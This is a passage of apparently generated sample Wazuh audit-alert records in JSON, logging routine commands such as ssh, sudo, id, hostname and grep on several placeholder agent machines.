/usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: 